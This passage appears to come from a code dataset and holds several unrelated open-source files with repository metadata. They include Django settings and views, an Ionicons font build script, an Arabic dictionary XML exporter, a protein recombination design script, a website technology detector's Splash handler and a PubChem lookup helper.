########## GENERAL CONFIG
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Sao_Paulo'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-US'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Language
LANGUAGES = (
('en', ('English')),
)
# Locale Paths
LOCALE_PATHS = (
# normpath(join(REPO_ROOT, 'locale')),
)
########## END GENERAL CONFIG
########## MEDIA CONFIG
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = normpath(join(PROJECT_ROOT, 'media'))
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = '/media/'
########## END MEDIA CONFIG
########## STATIC FILE CONFIG
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
# STATIC_ROOT = normpath(join(PROJECT_ROOT, 'assets'))
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
normpath(join(PROJECT_ROOT, 'static')),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
########## END STATIC FILE CONFIG
########## SECRET CONFIG
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'SECRET_KEY'
########## END SECRET CONFIG
########## TEMPLATE CONFIG
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
)
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
normpath(join(PROJECT_ROOT, 'templates')),
)
########### END TEMPLATE CONFIG
########### MIDDLEWARE CONFIG
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
########### END MIDDLEWARE CONFIG
########### URL CONFIG
ROOT_URLCONF = '%s.urls' % SITE_NAME
########### END URL CONFIG
########## WSGI CONFIG
WSGI_APPLICATION = '{{cookiecutter.project_name}}.wsgi.application'
########## END WSGI CONFIG
########## AUTHENTICATION_BACKENDS
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
########## END AUTHENTICATION_BACKENDS
########## APPS CONFIG
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# 'django.contrib.humanize', # Useful template tags:
# Admin Panel and Admin docs
'django.contrib.admin',
'django.contrib.admindocs',
)
THIRD_PARTY_APPS = (
'south', # Migrations
)
LOCAL_APPS = (
)
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
########## END APPS CONFIG
########## LOGGING CONFIG
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site a dmins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
########## END LOGGING CONFIG
|
mit
| -3,837,163,642,000,832,500
| 28.548523
| 88
| 0.684135
| false
| 3.717091
| true
| false
| false
|
northDacoder/angular_ionic_project
|
ionicons-1.4.1/builder/generate.py
|
1
|
7596
|
from subprocess import call
import os
import json
BUILDER_PATH = os.path.dirname(os.path.abspath(__file__))
ROOT_PATH = os.path.join(BUILDER_PATH, '..')
FONTS_FOLDER_PATH = os.path.join(ROOT_PATH, 'fonts')
CSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'css')
SCSS_FOLDER_PATH = os.path.join(ROOT_PATH, 'scss')
def main():
generate_font_files()
data = get_build_data()
rename_svg_glyph_names(data)
generate_scss(data)
generate_cheatsheet(data)
generate_component_json(data)
generate_composer_json(data)
generate_bower_json(data)
def generate_font_files():
print "Generate Fonts"
cmd = "fontforge -script %s/scripts/generate_font.py" % (BUILDER_PATH)
call(cmd, shell=True)
def rename_svg_glyph_names(data):
# hacky and slow (but safe) way to rename glyph-name attributes
svg_path = os.path.join(FONTS_FOLDER_PATH, 'ionicons.svg')
svg_file = open(svg_path, 'r+')
svg_text = svg_file.read()
svg_file.seek(0)
for ionicon in data['icons']:
# uniF2CA
org_name = 'uni%s' % (ionicon['code'].replace('0x', '').upper())
ion_name = 'ion-%s' % (ionicon['name'])
svg_text = svg_text.replace(org_name, ion_name)
svg_file.write(svg_text)
svg_file.close()
def generate_scss(data):
print "Generate SCSS"
font_name = data['name']
font_version = data['version']
css_prefix = data['prefix']
variables_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-variables.scss')
icons_file_path = os.path.join(SCSS_FOLDER_PATH, '_ionicons-icons.scss')
d = []
d.append('// Ionicons Variables')
d.append('// --------------------------\n')
d.append('$ionicons-font-path: "../fonts" !default;')
d.append('$ionicons-font-family: "%s" !default;' % (font_name) )
d.append('$ionicons-version: "%s" !default;' % (font_version) )
d.append('$ionicons-prefix: %s !default;' % (css_prefix) )
d.append('')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('$ionicon-var-%s: "%s";' % (ionicon['name'], chr_code) )
f = open(variables_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
d = []
d.append('// Ionicons Icons')
d.append('// --------------------------\n')
group = [ '.%s' % (data['name'].lower()) ]
for ionicon in data['icons']:
group.append('.#{$ionicons-prefix}%s' % (ionicon['name']) )
d.append( ',\n'.join(group) )
d.append('{')
d.append(' @extend .ion;')
d.append('}')
for ionicon in data['icons']:
chr_code = ionicon['code'].replace('0x', '\\')
d.append('.#{$ionicons-prefix}%s:before { content: $ionicon-var-%s; }' % (ionicon['name'], ionicon['name']) )
f = open(icons_file_path, 'w')
f.write( '\n'.join(d) )
f.close()
generate_css_from_scss(data)
def generate_css_from_scss(data):
print "Generate CSS From SCSS"
scss_file_path = os.path.join(SCSS_FOLDER_PATH, 'ionicons.scss')
css_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.css')
css_min_file_path = os.path.join(CSS_FOLDER_PATH, 'ionicons.min.css')
cmd = "sass %s %s --style compact" % (scss_file_path, css_file_path)
call(cmd, shell=True)
print "Generate Minified CSS From SCSS"
cmd = "sass %s %s --style compressed" % (scss_file_path, css_min_file_path)
call(cmd, shell=True)
def generate_cheatsheet(data):
print "Generate Cheatsheet"
cheatsheet_file_path = os.path.join(ROOT_PATH, 'cheatsheet.html')
template_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'template.html')
icon_row_path = os.path.join(BUILDER_PATH, 'cheatsheet', 'icon-row.html')
f = open(template_path, 'r')
template_html = f.read()
f.close()
f = open(icon_row_path, 'r')
icon_row_template = f.read()
f.close()
content = []
for ionicon in data['icons']:
css_code = ionicon['code'].replace('0x', '\\')
escaped_html_code = ionicon['code'].replace('0x', '&#x') + ';'
html_code = ionicon['code'].replace('0x', '&#x') + ';'
item_row = icon_row_template
item_row = item_row.replace('{{name}}', ionicon['name'])
item_row = item_row.replace('{{prefix}}', data['prefix'])
item_row = item_row.replace('{{css_code}}', css_code)
item_row = item_row.replace('{{escaped_html_code}}', escaped_html_code)
item_row = item_row.replace('{{html_code}}', html_code)
content.append(item_row)
template_html = template_html.replace("{{font_name}}", data["name"])
template_html = template_html.replace("{{font_version}}", data["version"])
template_html = template_html.replace("{{icon_count}}", str(len(data["icons"])) )
template_html = template_html.replace("{{content}}", '\n'.join(content) )
f = open(cheatsheet_file_path, 'w')
f.write(template_html)
f.close()
def generate_component_json(data):
print "Generate component.json"
d = {
"name": data['name'],
"repo": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"version": data['version'],
"keywords": [],
"dependencies": {},
"development": {},
"license": "MIT",
"styles": [
"css/%s.css" % (data['name'].lower())
],
"fonts": [
"fonts/%s.eot" % (data['name'].lower()),
"fonts/%s.svg" % (data['name'].lower()),
"fonts/%s.ttf" % (data['name'].lower()),
"fonts/%s.woff" % (data['name'].lower())
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
component_file_path = os.path.join(ROOT_PATH, 'component.json')
f = open(component_file_path, 'w')
f.write(txt)
f.close()
def generate_composer_json(data):
print "Generate composer.json"
d = {
"name": "driftyco/ionicons",
"description": "The premium icon font for Ionic Framework.",
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"homepage": "http://ionicons.com/",
"authors": [
{
"name": "Ben Sperry",
"email": "ben@drifty.com",
"role": "Designer",
"homepage": "https://twitter.com/helloimben"
},
{
"name": "Adam Bradley",
"email": "adam@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/adamdbradley"
},
{
"name": "Max Lynch",
"email": "max@drifty.com",
"role": "Developer",
"homepage": "https://twitter.com/maxlynch"
}
],
"extra": {},
"license": [ "MIT" ]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
composer_file_path = os.path.join(ROOT_PATH, 'composer.json')
f = open(composer_file_path, 'w')
f.write(txt)
f.close()
def generate_bower_json(data):
print "Generate bower.json"
d = {
"name": data['name'],
"version": data['version'],
"homepage": "https://github.com/driftyco/ionicons",
"authors": [
"Ben Sperry <ben@drifty.com>",
"Adam Bradley <adam@drifty.com>",
"Max Lynch <max@drifty.com>"
],
"description": "Ionicons - free and beautiful icons from the creators of Ionic Framework",
"main": [
"css/%s.css" % (data['name'].lower()),
"fonts/*"
],
"keywords": [ "fonts", "icon font", "icons", "ionic", "web font"],
"license": "MIT",
"ignore": [
"**/.*",
"builder",
"node_modules",
"bower_components",
"test",
"tests"
]
}
txt = json.dumps(d, indent=4, separators=(',', ': '))
bower_file_path = os.path.join(ROOT_PATH, 'bower.json')
f = open(bower_file_path, 'w')
f.write(txt)
f.close()
def get_build_data():
build_data_path = os.path.join(BUILDER_PATH, 'build_data.json')
f = open(build_data_path, 'r')
data = json.loads(f.read())
f.close()
return data
if __name__ == "__main__":
main()
|
mit
| 3,167,289,036,028,404,000
| 27.772727
| 113
| 0.594787
| false
| 2.941905
| false
| false
| false
|
linuxscout/arramooz
|
scripts/nouns/xmldict.py
|
1
|
1996
|
#!/usr/bin/python2
# -*- coding=utf-8 -*-
#************************************************************************
# $Id: generatenoundict.py,v 0.7 2011/03/26 01:10:00 Taha Zerrouki $
#
# ------------
# Description:
# ------------
# Copyright (c) 2011, Arabtechies, Arabeyes Taha Zerrouki
#
# This file is the main file to execute the application in the command line
#
# -----------------
# Revision Details: (Updated by Revision Control System)
# -----------------
# $Date: 2009/06/02 01:10:00 $
# $Author: Taha Zerrouki $
# $Revision: 0.7 $
# $Source: arabtechies.sourceforge.net
#
#***********************************************************************/
import csvdict
import noundict_functions as ndf
class XmlDict(csvdict.CsvDict):
""" a virtual converter of data from table to specific format
the data is big, then every function print string """
def __init__(self, wordtype, version="N/A"):
"""
initiate the dict
"""
csvdict.CsvDict.__init__(self, wordtype, version)
def add_header(self,):
"""
add the header for new dict
"""
line ="""<?xml version='1.0' encoding='utf8'?>\n"""
line += "<!--" + "-->\n<!--".join(self.headerlines) + "-->\n"
line += "<dictionary>"
return line
def add_record(self, noun_row):
"""
Add a new to the dict
"""
fields = self.treat_tuple(noun_row)
line="<noun id='%d'>\n"%self.id;
for k in range(len(self.display_order)):
key = self.display_order[k];
if self.display_order[k] != "id":
if fields[key]:
line+=u" <%s>%s</%s>\n"%(key,fields[key],key);
else:
line+=u" <%s/>\n"%(key);
line+=u"</noun>\n";
return line
def add_footer(self):
"""close the data set, used for ending xml, or sql"""
return "</dictionary>"
|
gpl-2.0
| 393,406,699,130,314,700
| 30.68254
| 76
| 0.477455
| false
| 3.635701
| false
| false
| false
|
mattasmith/Non-contiguous-recombination
|
ncr.py
|
1
|
5343
|
#! /usr/local/bin/python
"""Script for designing a set of non-contiguous recombination libraries for site-directed, structure-guided homologous recombination.
******************************************************************
Copyright (C) 2011 Matt Smith, California Institute of Technology
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*******************************************************************
SCHEMA and non-contiguous recombination were developed in the laboratory of Frances H. Arnold at the California Institute of Technology.
References:
Smith, M.A. et al., Chimeragenesis of distantly-related proteins by non-contiguous recombination, Protein Science 22(2):231-238 (2013).
Voigt, C.A. et al., Protein building blocks preserved by recombination, Nature Structural Biology 9(7):553-558 (2002).
Karypis, G. et al., Multilevel Hypergraph Partitioning: Applications in VLSI Domain, 34th Design and Automation Conference, 526-529, (1997).
Karypis, G. et al., Multilevel k-way Hypergraph Partitioning, 36th Design Automation Conference, 343-348, 1999.
Edgar, R.C., MUSCLE: multiple sequence alignment with high accuracy and high throughput, Nucleic Acids Research 32(5), 1792-97.
"""
from subprocess import Popen
from sys import exit
from sys import path
path.append('./tools')
import os
from make_alignment_and_contacts2 import make_alignment_and_contacts2
from run_shmetis import run_shmetis
from PDB_tools import split_into_chains
## information about non-contiguous recombination
print('\n********************* Non-contiguous recombination *********************\n')
print('Written by Matt Smith, 2011.\n')
print('SCHEMA and non-contiguous recombination were developed in the \nlaboratory of Frances H. Arnold at the California Institute of Technology.\n')
## check the files are there
if os.path.isfile('alignment.fasta') == False:
exit('Error: cannot find \'alignment.fasta\' alignment file')
if os.path.isfile('init.txt') == False:
exit('Error: cannot find \'init.txt\' setup file.')
if os.path.isdir('./tools') == False:
exit('Error: the non-contiguous recombination tools are missing')
if len([f for f in os.listdir('./tools/muscle') if 'muscle' in f])==0:
exit('Error: cannot find MUSCLE in \'tools/muscle\'')
if len([f for f in os.listdir('./tools/muscle') if 'muscle' in f])>1:
exit('Error: please provide just one MUSCLE executable in \'tools/muscle\'')
if len([f for f in os.listdir('./tools') if 'hmetis' in f])==0:
exit('Error: cannot find hmetis package in \'tools\'')
if len([f for f in os.listdir('./tools') if 'hmetis-1.5' in f])>1:
exit('Error: please provide just one hmetis package in \'tools\'')
## load in the initial file
data = [s for s in open('init.txt').read().split('\n') if (len(s)>0 and s[0]!='#')]
for i,datum in enumerate(data):
if 'Number of blocks' in datum.split(' = ')[0]:
numberofblocks_str = datum.split(' = ')[1]
if '-' in numberofblocks_str:
numberofblocks_min = int(numberofblocks_str.split('-')[0])
numberofblocks_max = int(numberofblocks_str.split('-')[1])
else:
numberofblocks_min = int(numberofblocks_str)
numberofblocks_max = int(numberofblocks_str)
if 'Find all PDB structures' in datum.split(' = ')[0]:
searchPDB = int(datum.split(' = ')[1])
# end for i, datum
## find the muscle version
muscle_file = [f for f in os.listdir('./tools/muscle') if 'muscle' in f]
muscle_version = muscle_file[0]
## find the hmetis version
hmetis_file = [f for f in os.listdir('./tools') if 'hmetis-1.5' in f]
hmetis_version = hmetis_file[0]
## download all available structures or check user pdb files
if searchPDB == 1:
Popen('python ./tools/search_download_save.py',shell=True).wait()
else:
if os.path.isdir('./structures') == False:
exit('Error: you need to provide at least one pdb in a folder called \'structures\'')
elif len([f for f in os.listdir('./structures') if os.path.splitext(f)[-1].lower() == '.pdb'])==0:
exit('Error: there are no pdbs in \'structures\'')
else:
print('Structures provided by user:')
structurefilelist = os.listdir('./structures')
for filename in structurefilelist:
if os.path.splitext(filename)[-1].lower() == '.pdb':
print filename
split_into_chains(filename,'./structures/')
## create the contact maps - one for each parent (if the parent has a structure)
num_contact_maps = make_alignment_and_contacts2(muscle_version)
## formulate and solve with graph partitioning
print ('\nDesigning libraries...')
run_success = run_shmetis(num_contact_maps, numberofblocks_min, numberofblocks_max, hmetis_version)
## done!
|
gpl-3.0
| -7,719,600,997,329,283,000
| 46.283186
| 149
| 0.678271
| false
| 3.571524
| false
| false
| false
|
spectresearch/detectem
|
detectem/response.py
|
1
|
6146
|
import base64
import json
import logging
import re
import urllib.parse
from string import Template
import pkg_resources
import requests
from detectem.exceptions import SplashError
from detectem.settings import SPLASH_TIMEOUT, SPLASH_URL
from detectem.utils import docker_container
DEFAULT_CHARSET = "iso-8859-1"
ERROR_STATUS_CODES = [400, 504]
logger = logging.getLogger("detectem")
def is_url_allowed(url):
""" Return ``True`` if ``url`` is not in ``blacklist``.
:rtype: bool
"""
blacklist = [
r"\.ttf",
r"\.woff",
r"fonts\.googleapis\.com",
r"\.png",
r"\.jpe?g",
r"\.gif",
r"\.svg",
]
for ft in blacklist:
if re.search(ft, url):
return False
return True
def is_valid_mimetype(response):
""" Return ``True`` if the mimetype is not blacklisted.
:rtype: bool
"""
blacklist = ["image/"]
mimetype = response.get("mimeType")
if not mimetype:
return True
for bw in blacklist:
if bw in mimetype:
return False
return True
def get_charset(response):
""" Return charset from ``response`` or default charset.
:rtype: str
"""
# Set default charset
charset = DEFAULT_CHARSET
m = re.findall(r";charset=(.*)", response.get("mimeType", ""))
if m:
charset = m[0]
return charset
def create_lua_script(plugins):
""" Return script template filled up with plugin javascript data.
:rtype: str
"""
lua_template = pkg_resources.resource_string("detectem", "script.lua")
template = Template(lua_template.decode("utf-8"))
javascript_data = to_javascript_data(plugins)
return template.substitute(js_data=json.dumps(javascript_data))
def to_javascript_data(plugins):
"""
Return a dictionary with all JavaScript matchers. Quotes are escaped.
:rtype: dict
"""
def escape(v):
return re.sub(r'"', r'\\"', v)
def dom_matchers(p):
dom_matchers = p.get_matchers("dom")
escaped_dom_matchers = []
for dm in dom_matchers:
check_statement, version_statement = dm
escaped_dom_matchers.append(
{
"check_statement": escape(check_statement),
# Escape '' and not None
"version_statement": escape(version_statement or ""),
}
)
return escaped_dom_matchers
return [
{"name": p.name, "matchers": dom_matchers(p)}
for p in plugins.with_dom_matchers()
]
def get_response(url, plugins, timeout=SPLASH_TIMEOUT):
"""
Return response with HAR, inline scritps and software detected by JS matchers.
:rtype: dict
"""
lua_script = create_lua_script(plugins)
lua = urllib.parse.quote_plus(lua_script)
page_url = f"{SPLASH_URL}/execute?url={url}&timeout={timeout}&lua_source={lua}"
try:
with docker_container():
logger.debug("[+] Sending request to Splash instance")
res = requests.get(page_url)
except requests.exceptions.ConnectionError:
raise SplashError("Could not connect to Splash server {}".format(SPLASH_URL))
logger.debug("[+] Response received")
json_data = res.json()
if res.status_code in ERROR_STATUS_CODES:
raise SplashError(get_splash_error(json_data))
softwares = json_data["softwares"]
scripts = json_data["scripts"].values()
har = get_valid_har(json_data["har"])
js_error = get_evaljs_error(json_data)
if js_error:
logger.debug("[+] WARNING: failed to eval JS matchers: %(n)s", {"n": js_error})
else:
logger.debug("[+] Detected %(n)d softwares from the DOM", {"n": len(softwares)})
logger.debug("[+] Detected %(n)d scripts from the DOM", {"n": len(scripts)})
logger.debug("[+] Final HAR has %(n)d valid entries", {"n": len(har)})
return {"har": har, "scripts": scripts, "softwares": softwares}
def get_splash_error(json_data):
msg = json_data["description"]
if "info" in json_data and "error" in json_data["info"]:
error = json_data["info"]["error"]
if error.startswith("http"):
msg = "Request to site failed with error code {0}".format(error)
elif error.startswith("network"):
# see http://doc.qt.io/qt-5/qnetworkreply.html
qt_errors = {
"network1": "ConnectionRefusedError",
"network2": "RemoteHostClosedError",
"network3": "HostNotFoundError",
"network4": "TimeoutError",
"network5": "OperationCanceledError",
"network6": "SslHandshakeFailedError",
}
error = qt_errors.get(error, "error code {0}".format(error))
msg = "Request to site failed with {0}".format(error)
else:
msg = "{0}: {1}".format(msg, error)
return msg
def get_evaljs_error(json_data):
error = None
if "errors" in json_data and "evaljs" in json_data["errors"]:
res = json_data["errors"]["evaljs"]
if isinstance(res, str):
m = re.search(r"'message': '(.*?)'[,}]", res)
if m:
error = bytes(m.group(1), "utf-8").decode("unicode_escape")
return error
def get_valid_har(har_data):
""" Return list of valid HAR entries.
:rtype: list
"""
new_entries = []
entries = har_data.get("log", {}).get("entries", [])
logger.debug("[+] Detected %(n)d entries in HAR", {"n": len(entries)})
for entry in entries:
url = entry["request"]["url"]
if not is_url_allowed(url):
continue
response = entry["response"]["content"]
if not is_valid_mimetype(response):
continue
if response.get("text"):
charset = get_charset(response)
response["text"] = base64.b64decode(response["text"]).decode(charset)
else:
response["text"] = ""
new_entries.append(entry)
logger.debug("[+] Added URL: %(url)s ...", {"url": url[:100]})
return new_entries
|
mit
| 6,745,631,188,370,809,000
| 25.606061
| 88
| 0.582981
| false
| 3.718088
| false
| false
| false
|
ihoru/play_with_python
|
tasks/test_django/test_django/settings.py
|
1
|
3502
|
"""
Django settings for test_django project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '=0033co1(k8giglasb-&0-_5d%fbp*pfsa-u0173w4eb60clo3'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'quiz',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'test_django.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'test_django.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'ENGINE': 'django.db.backends.mysql',
'NAME': 'test_django',
'USER': 'ihoru',
'PASSWORD': '',
'HOST': '127.0.0.1',
'PORT': '3306',
'OPTIONS': {
'init_command': "SET sql_mode='STRICT_TRANS_TABLES'",
},
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'ru-ru'
TIME_ZONE = 'Europe/Moscow'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
mit
| 7,435,446,665,208,901,000
| 26.793651
| 91
| 0.669903
| false
| 3.488048
| false
| false
| false
|
SuLab/scheduled-bots
|
scheduled_bots/drugs/pubchem.py
|
1
|
3162
|
"""
Note: this is a really abbreviated version of sebastian's full pubchem bot
that simply gets the pubchem ID from an inchikey
Adapted from: https://github.com/sebotic/cdk_pywrapper/blob/master/cdk_pywrapper/chemlib.py
"""
import json
import time
import requests
import wikidataintegrator.wdi_core as wdi_core
class PubChemMolecule(object):
headers = {
'accept': 'application/json',
'content-type': 'application/json',
'charset': 'utf-8'
}
base_url = 'http://pubchem.ncbi.nlm.nih.gov/rest/rdf/{}'
def __init__(self, cid=None, inchi_key=None):
if cid:
self.cid = cid
if inchi_key:
self.stdinchikey = inchi_key
if cid:
pass
elif inchi_key:
cids = self._retrieve_pubchem_cids(self.stdinchikey)
if len(cids) == 0:
raise ValueError('InChI key not found in PubChem!')
if len(cids) == 1:
self.cid = cids[0]
else:
raise ValueError('More than one result: {}'.format(cids))
@staticmethod
def _retrieve_basic_compound_info(cid):
cmpnd_url = 'https://pubchem.ncbi.nlm.nih.gov/rest/rdf/compound/{}.json'.format(cid)
print(cmpnd_url)
# r = PubChemMolecule.s.get(cmpnd_url, headers=PubChemMolecule.headers).json()
r = requests.get(cmpnd_url, headers=PubChemMolecule.headers).json()
return r
@staticmethod
def _retrieve_pubchem_cids(ikey):
url = 'http://pubchem.ncbi.nlm.nih.gov/rest/rdf/inchikey/{}.json'.format(ikey)
try:
# r = PubChemMolecule.s.get(url, headers=PubChemMolecule.headers).json()
r = requests.get(url, headers=PubChemMolecule.headers).json()
except json.JSONDecodeError as e:
# print(e.__str__())
print('PubChem does not have this InChI key', ikey)
return []
cids = list()
if 'http://semanticscience.org/resource/is-attribute-of' in r['inchikey/{}'.format(ikey)]:
for x in r['inchikey/{}'.format(ikey)]['http://semanticscience.org/resource/is-attribute-of']:
cids.append(x['value'].split('/')[-1])
return cids
@property
def label(self):
return None
def to_wikidata(self):
refs = [[
wdi_core.WDItemID(value='Q278487', prop_nr='P248', is_reference=True), # stated in
wdi_core.WDExternalID(value=self.cid, prop_nr='P662', is_reference=True), # source element
wdi_core.WDTime(time=time.strftime('+%Y-%m-%dT00:00:00Z'), prop_nr='P813', is_reference=True) # retrieved
]]
elements = {
'P662': self.cid[3:]
}
data = []
for k, v in elements.items():
if not v:
continue
print('{}:'.format(k), v)
if isinstance(v, list) or isinstance(v, set):
for x in v:
data.append(wdi_core.WDString(prop_nr=k, value=x, references=refs))
else:
data.append(wdi_core.WDString(prop_nr=k, value=v, references=refs))
return data
|
mit
| 5,386,451,797,409,121,000
| 30.939394
| 118
| 0.57432
| false
| 3.335443
| false
| false
| false
|
protwis/protwis
|
similaritysearch/views.py
|
1
|
5740
|
from django.shortcuts import render, redirect
from django.conf import settings
from common.views import AbsReferenceSelection
from common.views import AbsSegmentSelection
#from common.views import AbsTargetSelection
from common.views import AbsTargetSelectionTable
# from common.alignment_SITE_NAME import Alignment
Alignment = getattr(__import__('common.alignment_' + settings.SITE_NAME, fromlist=['Alignment']), 'Alignment')
from collections import OrderedDict
class ReferenceSelection(AbsReferenceSelection):
step = 1
number_of_steps = 3
target_input = False
docs = 'sequences.html#similarity-search-gpcrdb'
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/similaritysearch/segmentselection',
'color': 'success',
},
}
class SegmentSelection(AbsSegmentSelection):
step = 2
number_of_steps = 3
docs = 'sequences.html#similarity-search-gpcrdb'
selection_boxes = OrderedDict([
('reference', True),
('segments', True),
('targets', False),
])
buttons = {
'continue': {
'label': 'Continue to next step',
'url': '/similaritysearch/targetselection',
'color': 'success',
},
}
class TargetSelection(AbsTargetSelectionTable):
step = 3
number_of_steps = 3
docs = "sequences.html#similarity-search-gpcrdb"
title = "SELECT RECEPTORS"
description = "Select receptors in the table (below) or browse the classification tree (right). You can select entire" \
+ " families or individual receptors.\n\nOnce you have selected all your receptors, click the green button."
selection_boxes = OrderedDict([
("reference", True),
("segments", True),
("targets", True),
])
buttons = {
"continue": {
"label": "Next",
"onclick": "submitSelection('/similaritysearch/render');",
"color": "success",
},
}
# class TargetSelection(AbsTargetSelection):
# step = 3
# number_of_steps = 3
